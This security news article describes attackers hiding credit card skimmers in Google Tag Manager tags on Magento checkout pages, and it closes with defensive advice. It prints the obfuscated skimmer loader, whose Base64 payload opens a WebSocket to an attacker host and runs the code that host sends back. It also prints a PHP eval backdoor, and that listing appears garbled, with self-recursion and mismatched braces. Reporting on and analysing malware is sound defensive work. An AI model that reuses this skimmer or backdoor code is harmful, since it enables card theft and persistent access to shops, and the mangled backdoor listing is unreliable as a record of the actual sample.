Hackers have been exploiting Google Tag Manager (GTM) to steal sensitive credit card information from eCommerce sites, particularly those built on the Magento platform.
This sophisticated attack shows the evolving tactics of cybercriminals in leveraging legitimate tools for malicious purposes.
Google Tag Manager is a free tool provided by Google that allows website owners to manage and deploy marketing tags without needing to modify the site’s code directly.
While researchers at Sucuri noted that it simplifies the process of adding and updating tags for tools like Google Analytics, AdWords, and Facebook Pixel, making it easier for marketers to track website activity and optimize campaigns.
The Malware Attack
The attack involves embedding malicious code within the GTM tags, which are designed to appear legitimate at first glance.
However, upon closer inspection, these scripts are found to be collecting sensitive data entered by users during the checkout process and sending it to a remote server controlled by the attackers.
The malicious code often appears as a standard GTM and Google Analytics tracking script but contains encoded JavaScript payloads that act as credit card skimmers. For instance:-
(function(i, s, h, k, l, o, c, m) {
m['GoogleAnalyticsObjects'] = o;
c = s.createElement(h), i = s.getElementsByTagName(h)[0];
if (l.href.match(new RegExp(atob(o)))) {
c.async = 1;
c.src = new Function(atob(k)).call(this);
}
})('jb', document, 'script', 'd2luZG93Lnd3ID0gbmV3IFdlYlNvY2tldCgoJ3dzczovL2V1cm93ZWJtb25pdG9ydG9vbC5jb20vY29tbW9uP3NvdXJjZT0nKSArIGVuY29kZVVSSUNvbXBvbmVudChsb2NhdGlvbi5ocmVmKSk7d2luZG93Lnd3Lm9ubWVzc2FnZT1mdW5jdGlvbihlKXtldmFsKGUuZGF0YSk7fQ==', window.location, 'Y2hlY2tvdXQ' + '=', '//www.google-analytics.com/analytics.js', window);This code uses Base64 encoding and obfuscation techniques to disguise its true purpose.
In addition to the GTM malware, a backdoor was discovered in the ./media/index.php file. This backdoor could be exploited to further infect the site, providing attackers with persistent access.
.webp)
Backdoor Code:-
function get_data($param, $default) {
$total = $_REQUEST;
if(isset($total[$param])) {
return $total[$param];
} else {
return $default;
}
}
function get_cli() {
if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false )
return "";
$param_name = "order";
$data = get_data($param_name, "");
$cli = get_cli();
return eval($cli);
}To protect against such attacks, website administrators should regularly monitor GTM tags to ensure that all tags are legitimate and placed by authorized personnel.
They should perform thorough audits to check for suspicious scripts and backdoors, use security tools such as website firewalls and malware detection systems, and keep all software updated by ensuring that all plugins and platforms are current.
Are you from SOC/DFIR Team? - Join 500,000+ Researchers to Analyze Cyber Threats with ANY.RUN Sandbox - Try for Free